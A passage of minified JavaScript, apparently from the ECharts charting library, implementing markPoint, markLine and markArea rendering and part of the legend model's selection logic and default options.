EL={min:Z(zL,"min"),max:Z(zL,"max"),average:Z(zL,"average"),median:Z(zL,"median")};function VL(t,e){if(e){var n=t.getData(),i=t.coordinateSystem,r=i&&i.dimensions;if(!function(t){return!isNaN(parseFloat(t.x))&&!isNaN(parseFloat(t.y))}(e)&&!Y(e.coord)&&Y(r)){var o=FL(e,n,i,t);if((e=C(e)).type&&EL[e.type]&&o.baseAxis&&o.valueAxis){var a=R(r,o.baseAxis.dim),s=R(r,o.valueAxis.dim),l=EL[e.type](n,o.valueAxis.dim,o.baseDataDim,o.valueDataDim,a,s);e.coord=l[0],e.value=l[1]}else e.coord=[null!=e.xAxis?e.xAxis:e.radiusAxis,null!=e.yAxis?e.yAxis:e.angleAxis]}if(null!=e.coord&&Y(r))for(var u=e.coord,c=0;c<2;c++)EL[u[c]]&&(u[c]=WL(n,n.mapDimension(r[c]),u[c]));else{e.coord=[];var h=t.getBaseAxis();if(h&&e.type&&EL[e.type]){var p=i.getOtherAxis(h);p&&(e.value=WL(n,n.mapDimension(p.dim),e.type))}}return e}}function FL(t,e,n,i){var r={};return null!=t.valueIndex||null!=t.valueDim?(r.valueDataDim=null!=t.valueIndex?e.getDimension(t.valueIndex):t.valueDim,r.valueAxis=n.getAxis(function(t,e){var n=t.getData().getDimensionInfo(e);return n&&n.coordDim}(i,r.valueDataDim)),r.baseAxis=n.getOtherAxis(r.valueAxis),r.baseDataDim=e.mapDimension(r.baseAxis.dim)):(r.baseAxis=i.getBaseAxis(),r.valueAxis=n.getOtherAxis(r.baseAxis),r.baseDataDim=e.mapDimension(r.baseAxis.dim),r.valueDataDim=e.mapDimension(r.valueAxis.dim)),r}function HL(t,e){return!(t&&t.containData&&e.coord&&!BL(e))||t.containData(e.coord)}function GL(t,e){return t?function(t,n,i,r){return lv(r<2?t.coord&&t.coord[r]:t.value,e[r])}:function(t,n,i,r){return lv(t.value,e[r])}}function WL(t,e,n){if("average"===n){var i=0,r=0;return t.each(e,function(t,e){isNaN(t)||(i+=t,r++)}),i/r}return"median"===n?t.getMedian(e):t.getDataExtent(e)["max"===n?1:0]}var UL=Ta(),ZL=function(t){function e(){var n=null!==t&&t.apply(this,arguments)||this;return n.type=e.type,n}return n(e,t),e.prototype.init=function(){this.markerGroupMap=mt()},e.prototype.render=function(t,e,n){var i=this,r=this.markerGroupMap;r.each(function(t){UL(t).keep=!1}),e.eachSeries(function(t){var r=RL.getMarkerModelFromSeries(t,i.type);r&&i.renderSeries(t,r,e,n)}),r.each(function(t){!UL(t).keep&&i.group.remove(t.group)}),function(t,e,n){t.eachSeries(function(t){var i=RL.getMarkerModelFromSeries(t,n),r=e.get(t.id);if(i&&r&&r.group){var o=Mp(i),a=o.z,s=o.zlevel;Tp(r.group,a,s)}})}(e,r,this.type)},e.prototype.markKeep=function(t){UL(t).keep=!0},e.prototype.toggleBlurSeries=function(t,e){var n=this;E(t,function(t){var i=RL.getMarkerModelFromSeries(t,n.type);i&&i.getData().eachItemGraphicEl(function(t){t&&(e?tc(t):ec(t))})})},e.type="marker",e}(ay);function YL(t,e,n){var i=e.coordinateSystem,r=n.getWidth(),o=n.getHeight(),a=i&&i.getArea&&i.getArea();t.each(function(n){var s,l=t.getItemModel(n),u="coordinate"===l.get("relativeTo"),c=u?a?a.width:0:r,h=u?a?a.height:0:o,p=u&&a?a.x:0,d=u&&a?a.y:0,f=No(l.get("x"),c)+p,g=No(l.get("y"),h)+d;if(isNaN(f)||isNaN(g)){if(e.getMarkerPosition)s=e.getMarkerPosition(t.getValues(t.dimensions,n));else if(i){var v=t.get(i.dimensions[0],n),y=t.get(i.dimensions[1],n);s=i.dataToPoint([v,y])}}else s=[f,g];isNaN(f)||(s[0]=f),isNaN(g)||(s[1]=g),t.setItemLayout(n,s)})}var XL=function(t){function e(){var n=null!==t&&t.apply(this,arguments)||this;return n.type=e.type,n}return n(e,t),e.prototype.updateTransform=function(t,e,n){e.eachSeries(function(t){var e=RL.getMarkerModelFromSeries(t,"markPoint");e&&(YL(e.getData(),t,n),this.markerGroupMap.get(t.id).updateLayout())},this)},e.prototype.renderSeries=function(t,e,n,i){var r=t.coordinateSystem,o=t.id,a=t.getData(),s=this.markerGroupMap,l=s.get(o)||s.set(o,new PT),u=function(t,e,n){var i;i=t?V(t&&t.dimensions,function(t){var n=e.getData();return A(A({},n.getDimensionInfo(n.mapDimension(t))||{}),{name:t,ordinalMeta:null})}):[{name:"value",type:"float"}];var r=new Yx(i,n),o=V(n.get("data"),Z(VL,e));t&&(o=H(o,Z(HL,t)));var a=GL(!!t,i);return r.initData(o,null,a),r}(r,t,e);e.setData(u),YL(e.getData(),t,i),u.each(function(t){var n=u.getItemModel(t),i=n.getShallow("symbol"),r=n.getShallow("symbolSize"),o=n.getShallow("symbolRotate"),s=n.getShallow("symbolOffset"),l=n.getShallow("symbolKeepAspect");if(X(i)||X(r)||X(o)||X(s)){var c=e.getRawValue(t),h=e.getDataParams(t);X(i)&&(i=i(c,h)),X(r)&&(r=r(c,h)),X(o)&&(o=o(c,h)),X(s)&&(s=s(c,h))}var p=n.getModel("itemStyle").getItemStyle(),d=n.get("z2"),f=rm(a,"color");p.fill||(p.fill=f),u.setItemVisual(t,{z2:at(d,0),symbol:i,symbolSize:r,symbolRotate:o,symbolOffset:s,symbolKeepAspect:l,style:p})}),l.updateData(u),this.group.add(l.group),u.eachItemGraphicEl(function(t){t.traverse(function(t){hu(t).dataModel=e})}),this.markKeep(l),l.group.silent=e.get("silent")||t.get("silent")},e.type="markPoint",e}(ZL);var jL=function(t){function e(){var n=null!==t&&t.apply(this,arguments)||this;return n.type=e.type,n}return n(e,t),e.prototype.createMarkerModelFromSeries=function(t,n,i){return new e(t,n,i)},e.type="markLine",e.defaultOption={z:5,symbol:["circle","arrow"],symbolSize:[8,16],symbolOffset:0,precision:2,tooltip:{trigger:"item"},label:{show:!0,position:"end",distance:5},lineStyle:{type:"dashed"},emphasis:{label:{show:!0},lineStyle:{width:3}},animationEasing:"linear"},e}(RL),qL=hh.prototype,KL=gh.prototype,$L=function(){this.x1=0,this.y1=0,this.x2=0,this.y2=0,this.percent=1};!function(t){function e(){return null!==t&&t.apply(this,arguments)||this}n(e,t)}($L);function QL(t){return isNaN(+t.cpx1)||isNaN(+t.cpy1)}var JL=function(t){function e(e){var n=t.call(this,e)||this;return n.type="ec-line",n}return n(e,t),e.prototype.getDefaultStyle=function(){return{stroke:Cf.color.neutral99,fill:null}},e.prototype.getDefaultShape=function(){return new $L},e.prototype.buildPath=function(t,e){QL(e)?qL.buildPath.call(this,t,e):KL.buildPath.call(this,t,e)},e.prototype.pointAt=function(t){return QL(this.shape)?qL.pointAt.call(this,t):KL.pointAt.call(this,t)},e.prototype.tangentAt=function(t){var e=this.shape,n=QL(e)?[e.x2-e.x1,e.y2-e.y1]:KL.tangentAt.call(this,t);return Et(n,n)},e}(Bl),tO=["fromSymbol","toSymbol"];function eO(t){return"_"+t+"Type"}function nO(t,e,n){var i=e.getItemVisual(n,t);if(!i||"none"===i)return i;var r=e.getItemVisual(n,t+"Size"),o=e.getItemVisual(n,t+"Rotate"),a=e.getItemVisual(n,t+"Offset"),s=e.getItemVisual(n,t+"KeepAspect"),l=Tm(r);return i+l+km(a||0,l)+(o||"")+(s||"")}function iO(t,e,n){var i=e.getItemVisual(n,t);if(i&&"none"!==i){var r=e.getItemVisual(n,t+"Size"),o=e.getItemVisual(n,t+"Rotate"),a=e.getItemVisual(n,t+"Offset"),s=e.getItemVisual(n,t+"KeepAspect"),l=Tm(r),u=km(a||0,l),c=Mm(i,-l[0]/2+u[0],-l[1]/2+u[1],l[0],l[1],null,s);return c.__specifiedRotation=null==o||isNaN(o)?void 0:+o*Math.PI/180||0,c.name=t,c}}function rO(t,e){t.x1=e[0][0],t.y1=e[0][1],t.x2=e[1][0],t.y2=e[1][1],t.percent=1;var n=e[2];n?(t.cpx1=n[0],t.cpy1=n[1]):(t.cpx1=NaN,t.cpy1=NaN)}var oO=function(t){function e(e,n,i){var r=t.call(this)||this;return r._createLine(e,n,i),r}return n(e,t),e.prototype._createLine=function(t,e,n){var i=t.hostModel,r=t.getItemLayout(e),o=t.getItemVisual(e,"z2"),a=function(t){var e=new JL({name:"line",subPixelOptimize:!0});return rO(e.shape,t),e}(r);a.shape.percent=0,zh(a,{z2:at(o,0),shape:{percent:1}},i,e),this.add(a),E(tO,function(n){var i=iO(n,t,e);this.add(i),this[eO(n)]=nO(n,t,e)},this),this._updateCommonStl(t,e,n)},e.prototype.updateData=function(t,e,n){var i=t.hostModel,r=this.childOfName("line"),o=t.getItemLayout(e),a={shape:{}};rO(a.shape,o),Bh(r,a,i,e),E(tO,function(n){var i=nO(n,t,e),r=eO(n);if(this[r]!==i){this.remove(this.childOfName(n));var o=iO(n,t,e);this.add(o)}this[r]=i},this),this._updateCommonStl(t,e,n)},e.prototype.getLinePath=function(){return this.childAt(0)},e.prototype._updateCommonStl=function(t,e,n){var i=t.hostModel,r=this.childOfName("line"),o=n&&n.emphasisLineStyle,a=n&&n.blurLineStyle,s=n&&n.selectLineStyle,l=n&&n.labelStatesModels,u=n&&n.emphasisDisabled,c=n&&n.focus,h=n&&n.blurScope;if(!n||t.hasItemOption){var p=t.getItemModel(e),d=p.getModel("emphasis");o=d.getModel("lineStyle").getLineStyle(),a=p.getModel(["blur","lineStyle"]).getLineStyle(),s=p.getModel(["select","lineStyle"]).getLineStyle(),u=d.get("disabled"),c=d.get("focus"),h=d.get("blurScope"),l=Lp(p)}var f=t.getItemVisual(e,"style"),g=f.stroke;r.useStyle(f),r.style.fill=null,r.style.strokeNoScale=!0,r.ensureState("emphasis").style=o,r.ensureState("blur").style=a,r.ensureState("select").style=s,E(tO,function(t){var e=this.childOfName(t);if(e){e.setColor(g),e.style.opacity=f.opacity;for(var n=0;n<Du.length;n++){var i=Du[n],o=r.getState(i);if(o){var a=o.style||{},s=e.ensureState(i),l=s.style||(s.style={});null!=a.stroke&&(l[e.__isEmptyBrush?"stroke":"fill"]=a.stroke),null!=a.opacity&&(l.opacity=a.opacity)}}e.markRedraw()}},this);var v=i.getRawValue(e);Pp(this,l,{labelDataIndex:e,labelFetcher:{getFormattedLabel:function(e,n){return i.getFormattedLabel(e,n,t.dataType)}},inheritColor:g||Cf.color.neutral99,defaultOpacity:f.opacity,defaultText:(null==v?t.getName(e):isFinite(v)?zo(v,10):v)+""});var y=this.getTextContent();if(y){var m=l.normal;y.__align=y.style.align,y.__verticalAlign=y.style.verticalAlign,y.__position=m.get("position")||"middle";var _=m.get("distance");Y(_)||(_=[_,_]),y.__labelDistance=_}this.setTextConfig({position:null,local:!0,inside:!1}),pc(this,c,h,u)},e.prototype.highlight=function(){Qu(this)},e.prototype.downplay=function(){Ju(this)},e.prototype.updateLayout=function(t,e){this.childOfName("line").stopAnimation(),this.setLinePoints(t.getItemLayout(e))},e.prototype.setLinePoints=function(t){var e=this.childOfName("line");rO(e.shape,t),e.dirty()},e.prototype.beforeUpdate=function(){var t=this,e=t.childOfName("fromSymbol"),n=t.childOfName("toSymbol"),i=t.getTextContent();if(e||n||i&&!i.ignore){for(var r=1,o=this.parent;o;)o.scaleX&&(r/=o.scaleX),o=o.parent;var a=t.childOfName("line");if(this.__dirty||a.__dirty){var s=a.shape.percent,l=a.pointAt(0),u=a.pointAt(s),c=Lt([],u,l);if(Et(c,c),e&&(e.setPosition(l),S(e,0),e.scaleX=e.scaleY=r*s,e.markRedraw()),n&&(n.setPosition(u),S(n,1),n.scaleX=n.scaleY=r*s,n.markRedraw()),i&&!i.ignore){i.x=i.y=0,i.originX=i.originY=0;var h=void 0,p=void 0,d=i.__labelDistance,f=d[0]*r,g=d[1]*r,v=s/2,y=a.tangentAt(v),m=[y[1],-y[0]],_=a.pointAt(v);m[1]>0&&(m[0]=-m[0],m[1]=-m[1]);var x=y[0]<0?-1:1;if("start"!==i.__position&&"end"!==i.__position){var b=-Math.atan2(y[1],y[0]);u[0]<l[0]&&(b=Math.PI+b),i.rotation=b}var w=void 0;switch(i.__position){case"insideStartTop":case"insideMiddleTop":case"insideEndTop":case"middle":w=-g,p="bottom";break;case"insideStartBottom":case"insideMiddleBottom":case"insideEndBottom":w=g,p="top";break;default:w=0,p="middle"}switch(i.__position){case"end":i.x=c[0]*f+u[0],i.y=c[1]*g+u[1],h=c[0]>.8?"left":c[0]<-.8?"right":"center",p=c[1]>.8?"top":c[1]<-.8?"bottom":"middle";break;case"start":i.x=-c[0]*f+l[0],i.y=-c[1]*g+l[1],h=c[0]>.8?"right":c[0]<-.8?"left":"center",p=c[1]>.8?"bottom":c[1]<-.8?"top":"middle";break;case"insideStartTop":case"insideStart":case"insideStartBottom":i.x=f*x+l[0],i.y=l[1]+w,h=y[0]<0?"right":"left",i.originX=-f*x,i.originY=-w;break;case"insideMiddleTop":case"insideMiddle":case"insideMiddleBottom":case"middle":i.x=_[0],i.y=_[1]+w,h="center",i.originY=-w;break;case"insideEndTop":case"insideEnd":case"insideEndBottom":i.x=-f*x+u[0],i.y=u[1]+w,h=y[0]>=0?"right":"left",i.originX=f*x,i.originY=-w}i.scaleX=i.scaleY=r,i.setStyle({verticalAlign:i.__verticalAlign||p,align:i.__align||h})}}}function S(t,e){var n=t.__specifiedRotation;if(null==n){var i=a.tangentAt(e);t.attr("rotation",(1===e?-1:1)*Math.PI/2-Math.atan2(i[1],i[0]))}else t.attr("rotation",n)}},e}(ho),aO=function(){function t(t){this.group=new ho,this._LineCtor=t||oO}return t.prototype.updateData=function(t){var e=this;this._progressiveEls=null;var n=this,i=n.group,r=n._lineData;n._lineData=t,r||i.removeAll();var o=sO(t);t.diff(r).add(function(n){e._doAdd(t,n,o)}).update(function(n,i){e._doUpdate(r,t,i,n,o)}).remove(function(t){i.remove(r.getItemGraphicEl(t))}).execute()},t.prototype.updateLayout=function(){var t=this._lineData;t&&t.eachItemGraphicEl(function(e,n){e.updateLayout(t,n)},this)},t.prototype.incrementalPrepareUpdate=function(t){this._seriesScope=sO(t),this._lineData=null,this.group.removeAll()},t.prototype.incrementalUpdate=function(t,e,n){function i(t){t.isGroup||function(t){return t.animators&&t.animators.length>0}(t)||(t.incremental=n,t.ensureState("emphasis").hoverLayer=2)}this._progressiveEls=[];for(var r=t.start;r<t.end;r++){if(uO(e.getItemLayout(r))){var o=new this._LineCtor(e,r,this._seriesScope);o.traverse(i),this.group.add(o),e.setItemGraphicEl(r,o),this._progressiveEls.push(o)}}},t.prototype.remove=function(){this.group.removeAll()},t.prototype.eachRendered=function(t){_p(this._progressiveEls||this.group,t)},t.prototype._doAdd=function(t,e,n){if(uO(t.getItemLayout(e))){var i=new this._LineCtor(t,e,n);t.setItemGraphicEl(e,i),this.group.add(i)}},t.prototype._doUpdate=function(t,e,n,i,r){var o=t.getItemGraphicEl(n);uO(e.getItemLayout(i))?(o?o.updateData(e,i,r):o=new this._LineCtor(e,i,r),e.setItemGraphicEl(i,o),this.group.add(o)):this.group.remove(o)},t}();function sO(t){var e=t.hostModel,n=e.getModel("emphasis");return{lineStyle:e.getModel("lineStyle").getLineStyle(),emphasisLineStyle:n.getModel(["lineStyle"]).getLineStyle(),blurLineStyle:e.getModel(["blur","lineStyle"]).getLineStyle(),selectLineStyle:e.getModel(["select","lineStyle"]).getLineStyle(),emphasisDisabled:n.get("disabled"),blurScope:n.get("blurScope"),focus:n.get("focus"),labelStatesModels:Lp(e)}}function lO(t){return isNaN(t[0])||isNaN(t[1])}function uO(t){return t&&!lO(t[0])&&!lO(t[1])}var cO=Ta(),hO=function(t,e,n,i){var r,o=t.getData();if(Y(i))r=i;else{var a=i.type;if("min"===a||"max"===a||"average"===a||"median"===a||null!=i.xAxis||null!=i.yAxis){var s=void 0,l=void 0;if(null!=i.yAxis||null!=i.xAxis)s=e.getAxis(null!=i.yAxis?"y":"x"),l=ot(i.yAxis,i.xAxis);else{var u=FL(i,o,e,t);s=u.valueAxis,l=WL(o,tb(o,u.valueDataDim),a)}var c="x"===s.dim?0:1,h=1-c,p=C(i),d={coord:[]};p.type=null,p.coord=[],p.coord[h]=-1/0,d.coord[h]=1/0;var f=n.get("precision");f>=0&&K(l)&&(l=+l.toFixed(Math.min(f,20))),p.coord[c]=d.coord[c]=l,r=[p,d,{type:a,valueIndex:i.valueIndex,value:l}]}else r=[]}var g=[VL(t,r[0]),VL(t,r[1]),A({},r[2])];return g[2].type=g[2].type||null,I(g[2],g[0]),I(g[2],g[1]),g};function pO(t){return!isNaN(t)&&!isFinite(t)}function dO(t,e,n,i){var r=1-t,o=i.dimensions[t];return pO(e[r])&&pO(n[r])&&e[t]===n[t]&&i.getAxis(o).containData(e[t])}function fO(t,e){if("cartesian2d"===t.type){var n=e[0].coord,i=e[1].coord;if(n&&i&&(dO(1,n,i,t)||dO(0,n,i,t)))return!0}return HL(t,e[0])&&HL(t,e[1])}function gO(t,e,n,i,r){var o,a=i.coordinateSystem,s=t.getItemModel(e),l=No(s.get("x"),r.getWidth()),u=No(s.get("y"),r.getHeight());if(isNaN(l)||isNaN(u)){if(i.getMarkerPosition)o=i.getMarkerPosition(t.getValues(t.dimensions,e));else{var c=a.dimensions,h=t.get(c[0],e),p=t.get(c[1],e);o=a.dataToPoint([h,p])}if(qT(a,"cartesian2d")){var d=a.getAxis("x"),f=a.getAxis("y");c=a.dimensions;pO(t.get(c[0],e))?o[0]=d.toGlobalCoord(d.getExtent()[n?0:1]):pO(t.get(c[1],e))&&(o[1]=f.toGlobalCoord(f.getExtent()[n?0:1]))}isNaN(l)||(o[0]=l),isNaN(u)||(o[1]=u)}else o=[l,u];t.setItemLayout(e,o)}var vO=function(t){function e(){var n=null!==t&&t.apply(this,arguments)||this;return n.type=e.type,n}return n(e,t),e.prototype.updateTransform=function(t,e,n){e.eachSeries(function(t){var e=RL.getMarkerModelFromSeries(t,"markLine");if(e){var i=e.getData(),r=cO(e).from,o=cO(e).to;r.each(function(e){gO(r,e,!0,t,n),gO(o,e,!1,t,n)}),i.each(function(t){i.setItemLayout(t,[r.getItemLayout(t),o.getItemLayout(t)])}),this.markerGroupMap.get(t.id).updateLayout()}},this)},e.prototype.renderSeries=function(t,e,n,i){var r=t.coordinateSystem,o=t.id,a=t.getData(),s=this.markerGroupMap,l=s.get(o)||s.set(o,new aO);this.group.add(l.group);var u=function(t,e,n){var i;i=t?V(t&&t.dimensions,function(t){var n=e.getData();return A(A({},n.getDimensionInfo(n.mapDimension(t))||{}),{name:t,ordinalMeta:null})}):[{name:"value",type:"float"}];var r=new Yx(i,n),o=new Yx(i,n),a=new Yx([],n),s=V(n.get("data"),Z(hO,e,t,n));t&&(s=H(s,Z(fO,t)));var l=GL(!!t,i);return r.initData(V(s,function(t){return t[0]}),null,l),o.initData(V(s,function(t){return t[1]}),null,l),a.initData(V(s,function(t){return t[2]})),a.hasItemOption=!0,{from:r,to:o,line:a}}(r,t,e),c=u.from,h=u.to,p=u.line;cO(e).from=c,cO(e).to=h,e.setData(p);var d=e.get("symbol"),f=e.get("symbolSize"),g=e.get("symbolRotate"),v=e.get("symbolOffset");function y(e,n,r){var o=e.getItemModel(n);gO(e,n,r,t,i);var s=o.getModel("itemStyle").getItemStyle();null==s.fill&&(s.fill=rm(a,"color")),e.setItemVisual(n,{symbolKeepAspect:o.get("symbolKeepAspect"),symbolOffset:at(o.get("symbolOffset",!0),v[r?0:1]),symbolRotate:at(o.get("symbolRotate",!0),g[r?0:1]),symbolSize:at(o.get("symbolSize"),f[r?0:1]),symbol:at(o.get("symbol",!0),d[r?0:1]),style:s})}Y(d)||(d=[d,d]),Y(f)||(f=[f,f]),Y(g)||(g=[g,g]),Y(v)||(v=[v,v]),u.from.each(function(t){y(c,t,!0),y(h,t,!1)}),p.each(function(t){var e=p.getItemModel(t),n=e.getModel("lineStyle").getLineStyle();p.setItemLayout(t,[c.getItemLayout(t),h.getItemLayout(t)]);var i=e.get("z2");null==n.stroke&&(n.stroke=c.getItemVisual(t,"style").fill),p.setItemVisual(t,{z2:at(i,0),fromSymbolKeepAspect:c.getItemVisual(t,"symbolKeepAspect"),fromSymbolOffset:c.getItemVisual(t,"symbolOffset"),fromSymbolRotate:c.getItemVisual(t,"symbolRotate"),fromSymbolSize:c.getItemVisual(t,"symbolSize"),fromSymbol:c.getItemVisual(t,"symbol"),toSymbolKeepAspect:h.getItemVisual(t,"symbolKeepAspect"),toSymbolOffset:h.getItemVisual(t,"symbolOffset"),toSymbolRotate:h.getItemVisual(t,"symbolRotate"),toSymbolSize:h.getItemVisual(t,"symbolSize"),toSymbol:h.getItemVisual(t,"symbol"),style:n})}),l.updateData(p),u.line.eachItemGraphicEl(function(t){hu(t).dataModel=e,t.traverse(function(t){hu(t).dataModel=e})}),this.markKeep(l),l.group.silent=e.get("silent")||t.get("silent")},e.type="markLine",e}(ZL);var yO=function(t){function e(){var n=null!==t&&t.apply(this,arguments)||this;return n.type=e.type,n}return n(e,t),e.prototype.createMarkerModelFromSeries=function(t,n,i){return new e(t,n,i)},e.type="markArea",e.defaultOption={z:1,tooltip:{trigger:"item"},animation:!1,label:{show:!0,position:"top"},itemStyle:{borderWidth:0},emphasis:{label:{show:!0,position:"top"}}},e}(RL),mO=Ta(),_O=function(t,e,n,i){var r=i[0],o=i[1];if(r&&o){var a=VL(t,r),s=VL(t,o),l=a.coord,u=s.coord;l[0]=ot(l[0],-1/0),l[1]=ot(l[1],-1/0),u[0]=ot(u[0],1/0),u[1]=ot(u[1],1/0);var c=D([{},a,s]);return c.coord=[a.coord,s.coord],c.x0=a.x,c.y0=a.y,c.x1=s.x,c.y1=s.y,c}};function xO(t){return!isNaN(t)&&!isFinite(t)}function bO(t,e,n,i){var r=1-t;return xO(e[r])&&xO(n[r])}function wO(t,e){var n=e.coord[0],i=e.coord[1],r={coord:n,x:e.x0,y:e.y0},o={coord:i,x:e.x1,y:e.y1};return qT(t,"cartesian2d")?!(!n||!i||!bO(1,n,i)&&!bO(0,n,i))||function(t,e,n){return!(t&&t.containZone&&e.coord&&n.coord&&!BL(e)&&!BL(n))||t.containZone(e.coord,n.coord)}(t,r,o):HL(t,r)||HL(t,o)}function SO(t,e,n,i,r){var o,a=i.coordinateSystem,s=t.getItemModel(e),l=No(s.get(n[0]),r.getWidth()),u=No(s.get(n[1]),r.getHeight());if(isNaN(l)||isNaN(u)){if(i.getMarkerPosition){var c=t.getValues(["x0","y0"],e),h=t.getValues(["x1","y1"],e),p=a.clampData(c),d=a.clampData(h),f=[];"x0"===n[0]?f[0]=p[0]>d[0]?h[0]:c[0]:f[0]=p[0]>d[0]?c[0]:h[0],"y0"===n[1]?f[1]=p[1]>d[1]?h[1]:c[1]:f[1]=p[1]>d[1]?c[1]:h[1],o=i.getMarkerPosition(f,n,!0)}else{var g=[m=t.get(n[0],e),_=t.get(n[1],e)];a.clampData&&a.clampData(g,g),o=a.dataToPoint(g,!0)}if(qT(a,"cartesian2d")){var v=a.getAxis("x"),y=a.getAxis("y"),m=t.get(n[0],e),_=t.get(n[1],e);xO(m)?o[0]=v.toGlobalCoord(v.getExtent()["x0"===n[0]?0:1]):xO(_)&&(o[1]=y.toGlobalCoord(y.getExtent()["y0"===n[1]?0:1]))}isNaN(l)||(o[0]=l),isNaN(u)||(o[1]=u)}else o=[l,u];return o}var MO=[["x0","y0"],["x1","y0"],["x1","y1"],["x0","y1"]],TO=function(t){function e(){var n=null!==t&&t.apply(this,arguments)||this;return n.type=e.type,n}return n(e,t),e.prototype.updateTransform=function(t,e,n){e.eachSeries(function(t){var e=RL.getMarkerModelFromSeries(t,"markArea");if(e){var i=e.getData();i.each(function(e){var r=V(MO,function(r){return SO(i,e,r,t,n)});i.setItemLayout(e,r),i.getItemGraphicEl(e).setShape("points",r)})}},this)},e.prototype.renderSeries=function(t,e,n,i){var r=t.coordinateSystem,o=t.id,a=t.getData(),s=this.markerGroupMap,l=s.get(o)||s.set(o,{group:new ho});this.group.add(l.group),this.markKeep(l);var u=function(t,e,n){var i,r,o=["x0","y0","x1","y1"];if(t){var a=V(t&&t.dimensions,function(t){var n=e.getData();return A(A({},n.getDimensionInfo(n.mapDimension(t))||{}),{name:t,ordinalMeta:null})});r=V(o,function(t,e){return{name:t,type:a[e%2].type}}),i=new Yx(r,n)}else i=new Yx(r=[{name:"value",type:"float"}],n);var s=V(n.get("data"),Z(_O,e,t,n));t&&(s=H(s,Z(wO,t)));var l=t?function(t,e,n,i){return lv(t.coord[Math.floor(i/2)][i%2],r[i])}:function(t,e,n,i){return lv(t.value,r[i])};return i.initData(s,null,l),i.hasItemOption=!0,i}(r,t,e);e.setData(u),u.each(function(e){var n=V(MO,function(n){return SO(u,e,n,t,i)}),o=r.getAxis("x").scale,s=r.getAxis("y").scale,l=o.getExtent(),c=s.getExtent(),h=[o.parse(u.get("x0",e)),o.parse(u.get("x1",e))],p=[s.parse(u.get("y0",e)),s.parse(u.get("y1",e))];Eo(h),Eo(p);var d=!!(l[0]>h[1]||l[1]<h[0]||c[0]>p[1]||c[1]<p[0]);u.setItemLayout(e,{points:n,allClipped:d});var f=u.getItemModel(e),g=f.getModel("itemStyle").getItemStyle(),v=f.get("z2"),y=rm(a,"color");g.fill||(g.fill=y,j(g.fill)&&(g.fill=_i(g.fill,.4))),g.stroke||(g.stroke=y),u.setItemVisual(e,"style",g),u.setItemVisual(e,"z2",at(v,0))}),u.diff(mO(l).data).add(function(t){var e=u.getItemLayout(t),n=u.getItemVisual(t,"z2");if(!e.allClipped){var i=new ah({z2:at(n,0),shape:{points:e.points}});u.setItemGraphicEl(t,i),l.group.add(i)}}).update(function(t,n){var i=mO(l).data.getItemGraphicEl(n),r=u.getItemLayout(t),o=u.getItemVisual(t,"z2");r.allClipped?i&&l.group.remove(i):(i?Bh(i,{z2:at(o,0),shape:{points:r.points}},e,t):i=new ah({shape:{points:r.points}}),u.setItemGraphicEl(t,i),l.group.add(i))}).remove(function(t){var e=mO(l).data.getItemGraphicEl(t);l.group.remove(e)}).execute(),u.eachItemGraphicEl(function(t,n){var i=u.getItemModel(n),r=u.getItemVisual(n,"style");t.useStyle(u.getItemVisual(n,"style")),Pp(t,Lp(i),{labelFetcher:e,labelDataIndex:n,defaultText:u.getName(n)||"",inheritColor:j(r.fill)?_i(r.fill,1):Cf.color.neutral99}),gc(t,i),pc(t,null,null,i.get(["emphasis","disabled"])),hu(t).dataModel=e}),mO(l).data=u,l.group.silent=e.get("silent")||t.get("silent")},e.type="markArea",e}(ZL);var kO=function(t){function e(){var n=null!==t&&t.apply(this,arguments)||this;return n.type=e.type,n.layoutMode={type:"box",ignoreSize:!0},n}return n(e,t),e.prototype.init=function(t,e,n){this.mergeDefaultAndTheme(t,n),t.selected=t.selected||{},this._updateSelector(t)},e.prototype.mergeOption=function(e,n){t.prototype.mergeOption.call(this,e,n),this._updateSelector(e)},e.prototype._updateSelector=function(t){var e=t.selector,n=this.ecModel;!0===e&&(e=t.selector=["all","inverse"]),Y(e)&&E(e,function(t,i){j(t)&&(t={type:t}),e[i]=I(t,function(t,e){return"all"===e?{type:"all",title:t.getLocaleModel().get(["legend","selector","all"])}:"inverse"===e?{type:"inverse",title:t.getLocaleModel().get(["legend","selector","inverse"])}:void 0}(n,t.type))})},e.prototype.optionUpdated=function(){this._updateData(this.ecModel);var t=this._data;if(t[0]&&"single"===this.get("selectedMode")){for(var e=!1,n=0;n<t.length;n++){var i=t[n].get("name");if(this.isSelected(i)){this.select(i),e=!0;break}}!e&&this.select(t[0].get("name"))}},e.prototype._updateData=function(t){var e=[],n=[];t.eachRawSeries(function(i){var r,o=i.name;if(n.push(o),i.legendVisualProvider){var a=i.legendVisualProvider.getAllNames();t.isSeriesFiltered(i)||(n=n.concat(a)),a.length?e=e.concat(a):r=!0}else r=!0;r&&wa(i)&&e.push(i.name)}),this._availableNames=n;var i=this.get("data")||e,r=mt(),o=V(i,function(t){return(j(t)||K(t))&&(t={name:t}),r.get(t.name)?null:(r.set(t.name,!0),new td(t,this,this.ecModel))},this);this._data=H(o,function(t){return!!t})},e.prototype.getData=function(){return this._data},e.prototype.select=function(t){var e=this.option.selected;"single"===this.get("selectedMode")&&E(this._data,function(t){e[t.get("name")]=!1});e[t]=!0},e.prototype.unSelect=function(t){"single"!==this.get("selectedMode")&&(this.option.selected[t]=!1)},e.prototype.toggleSelected=function(t){var e=this.option.selected;e.hasOwnProperty(t)||(e[t]=!0),this[e[t]?"unSelect":"select"](t)},e.prototype.allSelect=function(){var t=this._data,e=this.option.selected;E(t,function(t){e[t.get("name",!0)]=!0})},e.prototype.inverseSelect=function(){var t=this._data,e=this.option.selected;E(t,function(t){var n=t.get("name",!0);e.hasOwnProperty(n)||(e[n]=!0),e[n]=!e[n]})},e.prototype.isSelected=function(t){var e=this.option.selected;return!(e.hasOwnProperty(t)&&!e[t])&&R(this._availableNames,t)>=0},e.prototype.getOrient=function(){return"vertical"===this.get("orient")?{index:1,name:"vertical"}:{index:0,name:"horizontal"}},e.type="legend.plain",e.dependencies=["series"],e.defaultOption={z:4,show:!0,orient:"horizontal",left:"center",bottom:Cf.size.m,align:"auto",backgroundColor:Cf.color.transparent,borderColor:Cf.color.border,borderRadius:0,borderWidth:0,padding:5,itemGap:8,itemWidth:25,itemHeight:14,symbolRotate:"inherit",symbolKeepAspect:!0,inactiveColor:Cf.color.disabled,inactiveBorderColor:Cf.color.disabled,inactiveBorderWidth:"auto",itemStyle:{color:"inherit",opacity:"inherit",borderColor:"inherit",borderWidth:"auto",borderCap:"inherit",borderJoin:"inherit",borderDashOffset:"inherit",borderMiterLimit:"inherit"},lineStyle:{width:"auto",color:"inherit",inactiveColor:Cf.color.disabled,inactiveWidth:2,opacity:"inherit",type:"inherit",cap:"inherit",join:"inherit",dashOffset:"